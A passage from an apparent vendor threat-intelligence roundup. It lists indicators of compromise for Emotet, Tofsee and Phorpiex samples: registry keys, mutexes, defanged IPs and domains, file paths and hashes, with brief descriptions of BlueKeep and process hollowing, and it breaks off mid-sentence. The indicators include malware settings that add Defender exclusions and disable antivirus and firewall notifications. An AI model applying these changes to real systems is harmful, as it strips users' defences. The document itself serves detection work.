`\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### \n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-LlgRqENIhWM/XeqUmmT5XKI/AAAAAAAAC-E/3rnd7ok1qAoqKrKLPi6POIY4ynT8gIfhgCLcBGAsYHQ/s1600/b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-N8wlzMdz6nY/XeqUqd_31_I/AAAAAAAAC-I/Da-pTJl4u5gf_yiWNj7xUNiXGTrSYBo4wCLcBGAsYHQ/s1600/b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Downloader.Emotet-7413880-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 13 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ONDEMANDINTERFACECACHE ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:0000000000080070 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:0000000000080070 \nValue Name: VirtualDesktop ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:000000000001025C ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:000000000001025C \nValue Name: VirtualDesktop ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: Type ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: ErrorControl ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: ImagePath ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: DisplayName ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: WOW64 ` | 2 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 13 \n`Global\\M98B68E3C` | 13 \n`Global\\IC019706B` | 2 \n`Global\\MC019706B` | 2 \n`Global\\Nx534F51BC` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`59[.]110[.]18[.]236` | 15 \n`103[.]211[.]218[.]205` | 15 \n`45[.]56[.]88[.]91` | 12 \n`51[.]254[.]137[.]156` | 8 \n`192[.]241[.]131[.]79` | 7 \n`51[.]68[.]220[.]244` | 6 \n`206[.]81[.]10[.]215` | 4 \n`217[.]149[.]241[.]121` | 3 \n`74[.]208[.]5[.]15` | 2 \n`169[.]254[.]255[.]255` | 2 \n`17[.]36[.]205[.]74` | 1 \n`173[.]194[.]204[.]109` | 1 \n`94[.]100[.]180[.]160` | 1 \n`107[.]14[.]73[.]68` | 1 \n`81[.]88[.]48[.]66` | 1 \n`184[.]106[.]54[.]11` | 1 \n`208[.]124[.]213[.]186` | 1 \n`95[.]216[.]33[.]71` | 1 \n`64[.]41[.]126[.]110` | 1 \n`64[.]98[.]36[.]173` | 1 \n`94[.]152[.]153[.]134` | 1 \n`143[.]95[.]235[.]37` | 1 \n`216[.]177[.]141[.]15` | 1 \n`52[.]96[.]38[.]82` | 1 \n`173[.]254[.]28[.]125` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`headonizm[.]in` | 15 \n`qantimagroup[.]com` | 8 \n`smtp[.]mail[.]com` | 2 \n`smtpout[.]secureserver[.]net` | 2 \n`smtp-mail[.]outlook[.]com` | 1 \n`smtp[.]mail[.]ru` | 1 \n`ssl0[.]ovh[.]net` | 1 \n`smtp[.]qiye[.]163[.]com` | 1 \n`mail1[.]hostingplatform[.]com` | 1 \n`smtp[.]corteshermanos[.]com` | 1 \n`mail[.]rekaicentres[.]com` | 1 \n`mail[.]fusat[.]cl` | 1 \n`mail[.]hces[.]net` | 1 \n`mail[.]mccmh[.]net` | 1 \n`manabi[.]ecuahosting[.]net` | 1 \n`smtp[.]cuttingedgestoneworks[.]com` | 1 \n`p52-smtp[.]mail[.]me[.]com` | 1 \n`smtp[.]siteprotect[.]com` | 1 \n`lawyers-mail[.]com` | 1 \n`mail[.]ec[.]rr[.]com` | 1 \n`just125[.]justhost[.]com` | 1 \n`mail[.]effinger-zentrum[.]ch` | 1 \n`mail[.]smscomm[.]net` | 1 \n`authsmtp[.]securemail[.]pro` | 1 \n`mail[.]lignum[.]com[.]gt` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\419.exe` | 15 \n`%ProgramData%\\Microsoft\\Crypto\\RSA\\S-1-5-18\\9bdfb692c085f99347f09462e5cd5445_9979f91c-9ae8-458a-b442-fe95beaeef26` | 2 \n`%ProgramData%\\gny7.exe` | 1 \n \n#### File Hashes\n\n` 0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab 1220dd6c5523dc0b6b6409e5b739216bc979826bcb8e43428f0889ff120fd63d 1ff11781388f142f3dd92900380de4501f12f652d20911b502dbea6d4e7c2533 2c9b1c7443421bc46987ae098dd00fa013b9722dfe6b6b518c3ab474d888d984 456f0957a36e00bf03b0e37d18e119d74b3bb08054f6248a2e7e87ddb93d7782 4bbdbcf77feea35ec8ebddead4ed7274c8404c5fe2df5d24029488424f1ce875 81fc2cb7ae6b7006b185b89427136ab8a520cbd687d0bbb5f1fc31b1a1c0f4ba 83fe7400534e8efcc5cec209b9b2835d61be0d88914bbfd6495fb675378aa2dd 8c483708b5b4230562f3d0d4dce10c6168b94ccb6e85ff5052c42513feda741e 9f48da5cd641b0bb9dffd3dec5d2442da67ed23367331eb8c181fc61ee54c41e c8078630214d7c029d23de03dedb7fab8a2f7f8df12ba99245682e3ca235179b ce11fa55f6717dadca7bdd3759b3d46217d085e78ea8bb94bb8145754741b5c5 e0ab84847c95820096ec02c1c23c15589320ddc180e6d9f0d61315409b755dc8 e74421edc6c5a113acbd4f754d64ac9502f59cbdae14ffa129357bc5251e9afc f3de992434fc44f62318ddbe2c209a11af19205bb347dac52d7534e7f3c5579a `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ZZGz7Mw7Z8U/XeqUJI0xf6I/AAAAAAAAC9s/gCkvLQHcGbYVoXxZKDwD5r7a7djm_ECdQCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-zTR6IMeKMG0/XeqUMrUQ9xI/AAAAAAAAC9w/x5eFuJAC-ksnhUZjpPzuyOuynw7TKP5dACLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-NaxAqYMkXLI/XeqUTyXXz6I/AAAAAAAAC94/2QIMSLmZj-8C7xCUmyUpHkVsZc-l2fQOQCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-KEWZIPleWss/XeqURNjr6gI/AAAAAAAAC90/PMISEvUv2jAWPB8fjlwfqfJroX0So17ywCLcBGAsYHQ/s1600/0a574aa7865ad973827f08457d92a690b80c51594c0cc95345062f4838d38aab_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Tofsee-7431752-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 14 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 14 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 11 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 9 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 9 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\lesyxfla ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\rkyedlrg ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\athnmuap ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\jcqwvdjy ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\dwkqpxds ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\xqekjrxm ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qjxdckqf ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`67[.]195[.]228[.]110/31` | 15 \n`172[.]217[.]197[.]26/31` | 15 \n`69[.]55[.]5[.]250` | 14 \n`43[.]231[.]4[.]7` | 14 \n`64[.]233[.]186[.]26/31` | 14 \n`81[.]19[.]78[.]64/30` | 14 \n`98[.]136[.]96[.]74/31` | 14 \n`98[.]136[.]96[.]76/31` | 14 \n`85[.]114[.]134[.]88` | 14 \n`77[.]88[.]21[.]89` | 13 \n`209[.]85[.]202[.]26/31` | 13 \n`172[.]217[.]7[.]132` | 13 \n`213[.]180[.]193[.]89` | 12 \n`67[.]195[.]204[.]72/30` | 12 \n`148[.]163[.]158[.]5` | 11 \n`67[.]195[.]228[.]109` | 11 \n`67[.]195[.]228[.]94` | 10 \n`31[.]31[.]194[.]100/31` | 10 \n`98[.]136[.]96[.]92/31` | 10 \n`46[.]4[.]52[.]109` | 9 \n`67[.]195[.]204[.]79` | 9 \n`46[.]28[.]66[.]2` | 9 \n`78[.]31[.]67[.]23` | 9 \n`188[.]165[.]238[.]150` | 9 \n`93[.]179[.]69[.]109` | 9 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 14 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 14 \n`list[.]ru` | 13 \n`mx0b-001b2d01[.]pphosted[.]com` | 11 \n`mx[.]yandex[.]ru` | 9 \n`yandex[.]ru` | 9 \n`mta5[.]am0[.]yahoodns[.]net` | 9 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 9 \n`aol[.]com` | 9 \n`yahoo[.]co[.]uk` | 9 \n`irina94[.]rusgirls[.]cn` | 9 \n`anastasiasweety[.]rugirls[.]cn` | 9 \n`beautyrus[.]cn` | 9 \n`smtp[.]secureserver[.]net` | 8 \n`mxs[.]mail[.]ru` | 8 \n`mail[.]ru` | 8 \n`mx[.]yandex[.]net` | 8 \n`eur[.]olc[.]protection[.]outlook[.]com` | 8 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 8 \n`mx1[.]emailsrvr[.]com` | 8 \n`mx-apac[.]mail[.]gm0[.]yahoodns[.]net` | 7 \n`bk[.]ru` | 7 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 7 \n`inbox[.]ru` | 7 \n`smtp-in[.]orange[.]fr` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 16 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 14 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 14 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 14 \n`%TEMP%\\hjekdqa.exe` | 1 \n`%TEMP%\\yavbuhr.exe` | 1 \n \n#### File Hashes\n\n` 109ca5f094a4e98b6dac4191043bcbc4a9e849a456ca581226f42fdd7812966a 2835bade0deb4c1f1af1beff0102a7122990fd5b868f82b5f23b5ddea782d862 284d642a2ae70ba3890f39595cf215c06037f514580bcc8766b3c136cb1c4df9 2c84c7ac4fdbcaba7ac72b01a03d5ee7d62db4e4986670d17d420a45872f3158 30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2 64a3e41af01cf5443314c0d49d7a83f081c99dbadda2dfe2af5d93ff49464f4b 74ac087c43dc71971fddc1d65b4586b57d4b6ec6182914d0d176722a3a70b4bc 7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538 84c98359fa8967beb941ffa16550358d39e1fd005dccbc697267b6f170c08aeb 91637560be3528716ac0c5586b39c763c54798a0b03a55db086a3128fa665fee 973e8cb33dae5fab6505ffb140ad80587081f131bb6bb5305582e874ec8d10b0 d0ec6c954e91bde1e104cec6f316aa1d2f94389883d602790aec0128f492547c e46c3033d16ed60026ee74546aaaf17fe0e0dccfe9c40bd0b434758c01fc8a17 eab97c31815fc018ec26360c575b02ec3cf7595c1c4c6bcd121ee2123335515f eaf18fa3b771523ea252436b6dd15d1c2e0d6f93a17f5a861251dbc38f0cf951 f551911671d006e8164ba14c2024bbe55646f5e1ec6c4fb16b7f199c51be6864 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-ufqU73JFz3o/XeqU7lz0kQI/AAAAAAAAC-U/jsKj0JmCJs4JClB6lqkg8u8lYarMfsM_wCLcBGAsYHQ/s1600/7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-O1eXG01gPKk/XeqU_YsqxhI/AAAAAAAAC-Y/bOHq-MRqWrkuGNfTJYNSuI_832awUB2QwCLcBGAsYHQ/s1600/7c6e8e91b032ae87eb17d1ff4edfdbf9f3d2b7e6cc1849cadffd40650f073538_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/--DsBmJd-k1A/XeqVEntLd1I/AAAAAAAAC-c/B7JsgcpTtBsWGdOMHDsOTJc1CTyGeLMWwCLcBGAsYHQ/s1600/30cadaa9bbf5f83ebad9e4738db169bacca7f78b4ae4256cc326533099dd64c2_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Downloader.Phorpiex-7428338-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SYSTEMRESTORE \nValue Name: DisableSR ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesOverride ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AutoUpdateDisableNotify ` | 17 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Services ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Services ` | 16 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Driver ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Microsoft Windows Driver ` | 1 \nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 5 \n`5500330044` | 2 \n`60807405680` | 1 \n`65078708650` | 1 \n`55970850860` | 1 \n`459500033940` | 1 \n`8855858939` | 1 \n`959505030340` | 1 \n`3949400403930` | 1 \n`974795976050` | 1 \n`56495605470` | 1 \n`8800550044` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`193[.]32[.]161[.]77` | 10 \n`94[.]156[.]133[.]65` | 6 \n`92[.]63[.]197[.]153` | 5 \n`92[.]63[.]197[.]59` | 5 \n`92[.]63[.]197[.]60` | 3 \n`95[.]81[.]1[.]43` | 3 \n`193[.]32[.]161[.]73` | 2 \n`199[.]73[.]55[.]48` | 2 \n`193[.]32[.]161[.]69` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`teubeufubg[.]su` | 7 \n`weoghehofu[.]su` | 7 \n`xiheiufisd[.]su` | 7 \n`aieieieros[.]su` | 7 \n`teoghehofu[.]su` | 7 \n`weubeufubg[.]su` | 7 \n`xeoghehofu[.]su` | 7 \n`wniaeninie[.]su` | 7 \n`tieieieros[.]su` | 7 \n`xieieieros[.]su` | 7 \n`aeoghehofu[.]su` | 7 \n`wiaeufaehe[.]su` | 7 \n`weuaueudgs[.]su` | 7 \n`wbaeubuegs[.]su` | 7 \n`wieieieros[.]su` | 7 \n`abaeubuegs[.]su` | 7 \n`tbaeubuegs[.]su` | 7 \n`aniaeninie[.]su` | 7 \n`xbaeubuegs[.]su` | 7 \n`teuaueudgs[.]su` | 7 \n`wiheiufisd[.]su` | 7 \n`xniaeninie[.]su` | 7 \n`tiheiufisd[.]su` | 7 \n`aiheiufisd[.]su` | 7 \n`aeubeufubg[.]su` | 7 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\_\\DeviceManager.exe` | 17 \n`\\.lnk` | 17 \n`E:\\.lnk` | 17 \n`E:\\_` | 17 \n`E:\\_\\DeviceManager.exe` | 17 \n`%APPDATA%\\winsvcs.txt` | 16 \n`%SystemRoot%\\2043700216632254` | 2 \n`%SystemRoot%\\2043700216632254\\winpmmt.exe` | 2 \n`%SystemRoot%\\5037867818202168\\winxvbc.exe` | 1 \n`%SystemRoot%\\1751841511079533\\winhlyh.exe` | 1 \n`%SystemRoot%\\1927513612308752\\winqfmt.exe` | 1 \n`%SystemRoot%\\7596387610791212\\winthul.exe` | 1 \n`%SystemRoot%\\19947372186510550` | 1 \n`%SystemRoot%\\19947372186510550\\wingtph.exe` | 1 \n`%SystemRoot%\\7815933519548311` | 1 \n`%SystemRoot%\\7815933519548311\\winpyzz.exe` | 1 \n`%SystemRoot%\\4232647816716713` | 1 \n`%SystemRoot%\\4232647816716713\\winzsjy.exe` | 1 \n`%SystemRoot%\\9082268219092826` | 1 \n`%SystemRoot%\\9082268219092826\\winzpox.exe` | 1 \n`%SystemRoot%\\6188541715897433` | 1 \n`%SystemRoot%\\6188541715897433\\winngob.exe` | 1 \n`%SystemRoot%\\1917973613436861` | 1 \n`%SystemRoot%\\1917973613436861\\windcnw.exe` | 1 \n`%SystemRoot%\\4140102414092928` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 12c7c57286a5c532800495f1b9c8c5415dbaf5539aec177009845e9ac3508be3 22854dc3febbab0b72663b08bbdda7a4ee4dc501764876b2160a8d982700b4f8 22b67655c0bee80c3afb4da0811ab18da62ca2b053f958864131722708c30be1 506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf 5150389a6d1c556e7d99671f1d3fbed15e5fd5cf01f26ea9638f08708a77a36f 63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f 6dde1772c9b506f82178de0a14ad8cc7721c5f0dafb22088703b1e8dade3adc6 6f7aa9178d9cfdc6b873d54740d08f8bbb73a53f2d52453ec904d1314f5153b6 75e85527ae7786063af164c13b8c7df2f248cb4e7253d41ef444a3b84aba5219 9c88188624210f684d7aab8447c2fb50882139cca5d1bdac72838c4e76650251 af0e787fd0b006c04b60eb5d69b815d053ef774fa2d0be00a246ce4a018e85cf be5004b5f58595bfdf4cb2f317bc7dfb2d66f50f1adabb177b76fdab997a21bb c0c1e55d87fc372bba9454d65f4f99b64ee2002743f4195cba72bae642beb7f9 cbab761baf4042ba54d4471df336c65cecf253e5d2ad0a61e51199bf4355f3a5 cfc2091a57f78ac04de77c5dd72aae7be27d5633d87b0d104430f50ade7b6a73 e2ac54ca79debd49bbe0efc028d43f6793f23a903f4410003c0eba709cdff406 f0b61687dea12c0981e6226eaa6bfe3889c710b1347c6c8a89eb220bd4dc3204 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-s3KcSHDhVNk/XeqVad3POXI/AAAAAAAAC-o/-2rJP5EFDdMXr03Qde4VjROrv4XzqC3DgCLcBGAsYHQ/s1600/63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rBwtLqqTZaE/XeqVfiaPcOI/AAAAAAAAC-w/DeUNJjLMMqsoZHr1dYTIwz5Y4Xg8Cw36QCLcBGAsYHQ/s1600/63eb4701bed59eeeeb937dcae9d28631c98c886cf4a72e38e851a0725641922f_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-UT2OwCX62wM/XeqVmBgj-FI/AAAAAAAAC-0/jTbZpsoBv301wKIGtwkfr2NRnV-V41HPACLcBGAsYHQ/s1600/506e17946a441837e8c42374d565cfc7331bf2e706124aa122710cf19f380fcf_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (15141) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (348) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nDealply adware detected \\- (346) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nKovter injection detected \\- (334) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nExcessively long PowerShell command detected \\- (287) \nA PowerShell command with a very long command line argument that may indicate an 